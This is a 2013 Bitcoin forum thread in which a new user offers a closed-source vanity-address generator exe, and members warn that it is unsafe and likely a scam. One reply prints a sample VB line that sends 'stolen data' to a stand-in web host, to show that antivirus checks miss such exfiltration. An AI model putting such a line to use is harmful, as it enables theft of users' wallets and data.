Bitcoin Forum
November 17, 2024, 01:15:55 PM *
News: Latest Bitcoin Core release: 28.0 [Torrent]
 
   Home   Help Search Login Register More  
Pages: [1]
  Print  
Author Topic: Alternative to: Custom Bitcoin Address Generator  (Read 1473 times)
ilian000 (OP)
Newbie
*
Offline Offline

Activity: 33
Merit: 0



View Profile
January 30, 2013, 02:37:55 PM
Last edit: February 15, 2013, 11:40:46 AM by ilian000
 #1

Edit: http://coinbit.tk is an online alternative Wink

Hello community!

I've programmed an application where you can generate your own custom address! It is designed for people who preffer a User Interface, instead of a console. It uses the Vanitygen binary as Library https://bitcointalk.org/index.php?topic=25804.0
This application is GPU accelerated. AMD GPU's are recommended if you want to generate large addresses.

Screenshot:
https://dl.dropbox.com/u/15267878/Screenshot.JPG

Download link: http://www.mediafire.com/?r0h675nej83ub8e

Virustotal: https://www.virustotal.com/file/cd58e35bc6bec67deb910d1bba8977eeb28b79a57a7f3648f9e3f0388397671a/analysis/

Attention xp users: Download .NET Framework 2.0 at http://www.microsoft.com/en-us/download/details.aspx?id=1639

If you have the OpenCL.dll error, please download the latest drivers from your GPU manufacturer.


Feel free to donate me for my work at 1iLiAn71UdXF2nT1MfUJMZdAjtmj4nidu

If this application won't work, please grab a screenshot and post it into this topic, thanks!
jasinlee
Hero Member
*****
Offline Offline

Activity: 742
Merit: 500


Its as easy as 0, 1, 1, 2, 3


View Profile
January 30, 2013, 02:42:04 PM
 #2

Havent downloaded it yet, but everyone be careful when downloading programs to your computers.

BTC 1JASiNZxmAN1WBS4dmGEDoPpzN3GV7dnjX DVC 1CxxZzqcy7YEVXfCn5KvgRxjeWvPpniK3                     Earn Devcoins Devtome.com
ilian000 (OP)
Newbie
*
Offline Offline

Activity: 33
Merit: 0



View Profile
January 30, 2013, 02:43:22 PM
 #3

I added a virustotal link. You can check the SHA256 hash before opening it.
deepceleron
Legendary
*
Offline Offline

Activity: 1512
Merit: 1036



View Profile WWW
January 30, 2013, 03:16:29 PM
 #4

This application is in violation of the GPL, the license and source code are not included. It uses Samr's vanitygen code.

This application crashes before it can run (or before I can detect bad actions). It extracts and deploys it's payload to a temp directory.

ilian000 (OP)
Newbie
*
Offline Offline

Activity: 33
Merit: 0



View Profile
January 30, 2013, 03:21:01 PM
 #5

Forgot to add sources, thanks for the reminder  Wink

Try to download .NET Framework 2.0 at http://www.microsoft.com/en-us/download/details.aspx?id=1639
cosmicone
Member
**
Offline Offline

Activity: 105
Merit: 10



View Profile
January 30, 2013, 03:24:34 PM
 #6

Why not just code this as a webpage, and and drop the whole 'download an application' thing?

Many people are not on windows.
ilian000 (OP)
Newbie
*
Offline Offline

Activity: 33
Merit: 0



View Profile
January 30, 2013, 03:27:31 PM
 #7

You could create a java applet of it, but it'll only use the CPU, instead of the GPU.
ilian000 (OP)
Newbie
*
Offline Offline

Activity: 33
Merit: 0



View Profile
January 30, 2013, 04:00:44 PM
 #8


This application crashes before it can run


I created a virtual machine to test the application in XP. You'll need to download the .NET Framework 2.0, otherwise you'll get that error.
OpenCL.dll won't work in VMWare tough. Try to run it in a non-virtualized enviroment.
ilian000 (OP)
Newbie
*
Offline Offline

Activity: 33
Merit: 0



View Profile
January 30, 2013, 07:35:43 PM
 #9

Bump
deepceleron
Legendary
*
Offline Offline

Activity: 1512
Merit: 1036



View Profile WWW
January 30, 2013, 07:46:19 PM
Last edit: January 30, 2013, 08:12:25 PM by deepceleron
 #10

You are wanting people to download an exe file. There is no way this can be made safe.

Even with analysis, the thing could lie in wait, only activating it's hidden "send the wallet.dat and wipe the hard drive" feature after a certain date or runtime. The addresses it makes could use less than good randomness or a deterministic seed, meaning it would be possible to easily cryptanalyse a seen vanity address to determine the key. The only way the exe could be close to trustable is if the unobfuscated source code is also published along with build instructions, and others are able to compile a binary-identical executable. Then after someone reviews it and says it's safe, you still only need to update the first post to point to a different file.

Then you are still putting your donation address on something that is 95% another person's work.
ilian000 (OP)
Newbie
*
Offline Offline

Activity: 33
Merit: 0



View Profile
January 30, 2013, 10:30:15 PM
 #11

You are wanting people to download an exe file. There is no way this can be made safe.

Even with analysis, the thing could lie in wait, only activating it's hidden "send the wallet.dat and wipe the hard drive" feature after a certain date or runtime. The addresses it makes could use less than good randomness or a deterministic seed, meaning it would be possible to easily cryptanalyse a seen vanity address to determine the key. The only way the exe could be close to trustable is if the unobfuscated source code is also published along with build instructions, and others are able to compile a binary-identical executable. Then after someone reviews it and says it's safe, you still only need to update the first post to point to a different file.

Then you are still putting your donation address on something that is 95% another person's work.

Well, there are many .NET code viewers (.NET Reflector, jetbrains,...) to grab the source code of it. You'll need to extract the exe with 7zip/WinRAR tough.
You can check the network connectivity if the application, if you really think that the app will send a wallet.dat to someone.
You can also debug the whole app using ollydbg if you are an expert...
ilian000 (OP)
Newbie
*
Offline Offline

Activity: 33
Merit: 0



View Profile
January 31, 2013, 06:20:23 PM
 #12

Why not just code this as a webpage, and and drop the whole 'download an application' thing?

Many people are not on windows.

I guess I'll start a website then Tongue
BitStick
Newbie
*
Offline Offline

Activity: 32
Merit: 0


View Profile
January 31, 2013, 09:54:08 PM
 #13


Never ever ever ever ever ever trust virustotal.com to tell you if a program is safe to use or not, virus checkers are not worth the hard drive space or the cpu time they consume.

I'm not suggesting there is anything wrong with his program I'm just wanting people to be aware that virus checkers are totally incapable of spotting software capable of transmitting information over the internet.

It needs .NET Framework so its probably done in Visual Studio.

A VB command that looks like this.

WebBrowser.Navigate("http://somedomain.com/Script.php?" + "your stolen data")

would send the text string "your stolen data" to the php script, virus checkers ignore this and since it goes out on port 80 your firewall treats it as a web browser and ignores it.

ilian000 (OP)
Newbie
*
Offline Offline

Activity: 33
Merit: 0



View Profile
February 01, 2013, 05:41:32 PM
 #14


Never ever ever ever ever ever trust virustotal.com to tell you if a program is safe to use or not, virus checkers are not worth the hard drive space or the cpu time they consume.

I'm not suggesting there is anything wrong with his program I'm just wanting people to be aware that virus checkers are totally incapable of spotting software capable of transmitting information over the internet.

It needs .NET Framework so its probably done in Visual Studio.

A VB command that looks like this.

WebBrowser.Navigate("http://somedomain.com/Script.php?" + "your stolen data")

would send the text string "your stolen data" to the php script, virus checkers ignore this and since it goes out on port 80 your firewall treats it as a web browser and ignores it.



As I said earlier, you can decompile the application to make sure it won't communicate with anyone. Try running it with an internet monitor, and you'll see that it's completely safe...
deepceleron
Legendary
*
Offline Offline

Activity: 1512
Merit: 1036



View Profile WWW
February 01, 2013, 05:59:45 PM
 #15

As I said earlier, the only way you are going to get anyone to download this, other than to see what you've done bad to get you banned, is to publish the source code and describe the build environment.

You join the forum, and 36 hours later post an exe = scammer.

You tell people to virus scan when anybody knows a trojan horse function won't be caught by one = scammer.

I tell you why we can't trust your exe, you challenge people to try to decompile it instead of posting source = scammer.

You change your OP after being called out for using other people's code without credit = scammer.

You bump your thread, like you haven't gotten the infection level you were hoping for, or the deterministic key balances on the net you were hoping to steal = scammer.
ilian000 (OP)
Newbie
*
Offline Offline

Activity: 33
Merit: 0



View Profile
February 15, 2013, 11:39:50 AM
 #16

Because all of you trusted the pervious program, I made the security of the following web service much better: http://coinbit.tk

It uses the Elliptic Curve Cryptography.

Have fun with it!
Pages: [1]
  Print  
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!